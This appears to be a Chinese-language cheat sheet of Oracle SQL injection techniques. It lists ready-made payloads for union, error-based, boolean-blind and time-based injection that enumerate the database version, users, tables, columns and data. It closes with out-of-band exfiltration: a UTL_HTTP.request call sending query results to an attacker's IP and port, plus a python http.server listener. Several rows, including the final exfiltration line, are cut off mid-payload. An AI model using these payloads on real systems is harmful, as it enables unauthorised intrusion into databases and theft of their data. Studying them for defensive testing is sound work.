端口:1521
使用
select * from dual; dual是oracle数据库中的虚拟表,用于占位查询
注释:--
chr(126)为~,为分隔符
utl_url.escape() url编码
对限定条件进行编码,解决dns外带乱码问题
<>可替代not in,用于嵌套查询,但是可用limit代替
一、union联合注入
| 方法 | 语句 |
|---|---|
| 判断注入 | '、"、\、and 1=1、and 1=2 |
| 判断数据库类型 | 返回正常为oracle数据库 and len('a') = 1 长度函数 and exist(select * from dual) dual表and (select count(*) from user_tables)>0 -- user_tables 系统表 |
| 判断列数 | order by |
| 判断占位符 | oracle数据库需要查询类型与表结构类型匹配,否则报错 使用时查询出一个数字型和一个字符型显示位即可,其余位用null占位 如: union select 1,'2',null,null from dual-- |
| 获取基本信息 | 获取数据库版本 union select 1,(select banner from sys.v_$version where rownum=1),3,4 from dual-- 获取数据库连接用户名 union select 1,(select sys_context('USERENV','CURRENT_USER') from dual),3,4 from dual-- 或 union select 1,(select user from dual),3,4 from dual-- 获取日志文件绝对路径 union select 1,(select instance_name from v$instance),3,4 from dual-- |
| 查用户 | union select 1,cast(owner as varchar(4000)),3,4 from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit=1--rownum:隐藏的行号 |
| 查表名 | union select 1,cast(table_name as varchar(4000)),3,4 from (select table_name,rownum as limit from (select distinct(table_name) from user_tables)) where limit=1-- |
| 查列名 | union select 1,cast(column_name as varchar(4000)),3,4 from (select column_name,rownum as limit from (select distinct(column_name) from user_tab_columns where table_name='表名')) where limit=1-- |
| 查数据 | union select 1,cast(name,pwd as varchar(4000)),3,4 from (select name,pwd,rownum as limit from (select * from 列名)) where limit=1 -- |
二、报错注入
常用报错函数
| 函数 | 说明 |
|---|---|
| dbms_xdb_version.checkin() | 检入签出的VCR并返回新创建的版本的资源ID and (select dbms_xdb_version.checkin((select user from dual))from dual)is not null |
| dbms_xdb_version.uncheckout() | 同checkin and (select dbms_xdb_version.uncheckout((select user from dual))from dual)is not null |
| utl_inaddr.get_host_name() | 在Oracle 11g及以后的版本中需要网络访问权限才可以使用 获取ip地址,其参数如果解析不了会报错 and utl_inaddr.get_host_name((select user from dual))=1-- |
| dbms_xdb_version.makeversioned() | and (select dbms_xdb_version.makeversioned((select user from dual))from dual)is not null-- |
| dbms_utility.sqlid_to_sqlhash() | and (select dbms_utility.sqlid_to_sqlhash((select user from dual))from dual)is not null-- |
| ordsys.ord_dicom.getmappingxpath() | and ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)=1-- |
| ctxsys.drithsx.sn() | and ctxsys.drithsx.sn(1,(select user from dual))=1-- |
过程
| 方法 | 语句 |
|---|---|
| 获取数据库版本 | and(select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1))from dual)is not null-- |
| 获取用户名 | and (select dbms_xdb_version.checkin((select user from dual))from dual)is not null-- 或 and (select dbms_xdb_version.checkin((select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit=1)) from dual) is not null -- |
| 获取表名 | and (select dbms_xdb_version.checkin((select table_name from (select table_name,rownum as limit from (select distinct(table_name) from user_tables)) where limit=1)) from dual) is not null -- |
| 获取列名 | and (select dbms_xdb_version.checkin((select column_name from (select column_name,rownum as limit from (select distinct(column_name) from user_tab_columns where table_name='表名')) where limit=1)) from dual) is not null -- |
| 获取数据 | `and(select dbms_xdb_version.checkin((select AGE |
三、布尔盲注
相关函数
| 函数 | 说明 |
|---|---|
| decode() | if(条件==值1)正确返回翻译值1,否则返回默认值 decode(条件,值1,翻译值1,值2,翻译值2,…值n,翻译值n,缺省值) |
| instr() | 返回发现指定的字符的位置 instr(string1,string2) instr(源字符串,目标字符串) |
1、猜解法
| 方法 | 语句 |
|---|---|
| 判断用户名 | and (select ascii(substr(user,1,1))from dual)>1-- 或 and (select ascii(substr((select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit=1),1,1))from dual)>1-- |
| 判断表名 | and (select ascii(substr(table_name,1,1)) from user_tables where rownum=1)>1-- |
| 判断列名 | and (select ascii(substr((select column_name from (select column_name,rownum as limit from (select distinct(column_name) from user_tab_columns where table_name='表名')) where limit=1),1,1))from dual)>1-- |
| 判断数据 | `and (select ascii(substr((select AGE |
2、decode
| 方法 | 语句 |
|---|---|
| 判断用户名 | and(select decode(substr(user,1,1),'T',1,0)from dual)-- T为猜解的字母 或 and(select decode(substr((select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit=1),1,1),'T',1,0)from dual)-- |
| 判断表名 | and(select decode(substr((select table_name from (select table_name,rownum as limit from (select distinct(table_name) from user_tables)) where limit=1),1,1),'T',1,0)from dual)-- |
| 判断字段名 | and(select decode(substr((select column_name from (select column_name,rownum as limit from (select distinct(column_name) from user_tab_columns where table_name='表名')) where limit=1),1,1),'T',1,0)from dual)-- |
| 判断数据 | and(select decode(substr((select AGE from (select AGE,rownum as limit from (select * from 字段名)) where limit=1),1,1),'T',1,0)from dual)-- |
3、instr
| 方法 | 语句 |
|---|---|
| 判断用户名 | and (instr((select user from dual),'T'))-- 或 and(instr((select (select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit=1) from dual),'T'))-- |
| 判断表名 | and (instr((select (select table_name from (select table_name,rownum as limit from (select distinct(table_name) from user_tables)) where limit=1) from dual),'T'))-- |
| 判断列名 | and (instr((select (select column_name from (select column_name,rownum as limit from (select distinct(column_name) from user_tab_columns where table_name='表名')) where limit=1) from dual),'T'))-- |
| 判断数据 | and (instr((select (select AGE from (select AGE,rownum as limit from (select * from 列名)) where limit=1) from dual),'T'))-- |
四、延时盲注
相关函数
| 函数 | 语句 |
|---|---|
| decode() | decode(condition,value,dbms_pipe.receive_message('ICQ',5),0) |
| DBMS_PIPE.RECEIVE_MESSAGE() | DBMS_PIPE.RECEIVE_MESSAGE('任意值',延迟时间) and dbms_pipe.receive_message('ICQ',5)=1 |
| 方法 | 语句 |
|---|---|
| 判断用户名 | and(select decode(substr(user,1,1),'T',dbms_pipe.receive_message('ICQ',3),0)from dual)=1-- 或 and(select decode(substr((select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit=1),1,1),’T’,dbms_pipe.receive_message('ICQ',3),0)from dual)=1-- |
| 判断表名 | and(select decode(substr((select table_name from (select table_name,rownum as limit from (select distinct(table_name) from user_tables)) where limit=1),1,1),'T',dbms_pipe.receive_message('ICQ',3),0)from dual)=1-- |
| 判断列名 | and(select decode(substr((select column_name from (select column_name,rownum as limit from (select distinct(column_name) from user_tab_columns where table_name='表名')) where limit=1),1,1),'T',dbms_pipe.receive_message('ICQ',3),0)from dual)=1-- |
| 判断数据 |
五、DNS外带
DNS外带函数
| 函数 | 说明 |
|---|---|
| UTL_HTTP.REQUEST | 用于取得web服务器的请求信息 select UTL_HTTP.REQUEST('http://www.baidu.com') from dual 返回百度的html源码 |
| UTL_INADDR.GET_HOST_ADDRESS | |
| SYS.DBMS_LDAP.INIT |
外带注入过程
| 方法 | 语句 |
|---|---|
| 检测函数是否可用 | and exists(select count(*) from all_objects where object_name='UTL_HTTP')-- 回显正常则可用 |
| 开启本地监听 | python -m http.server 1111 |
| 反弹信息 | `and UTL_HTTP.request(‘http://ip:监听端口/' |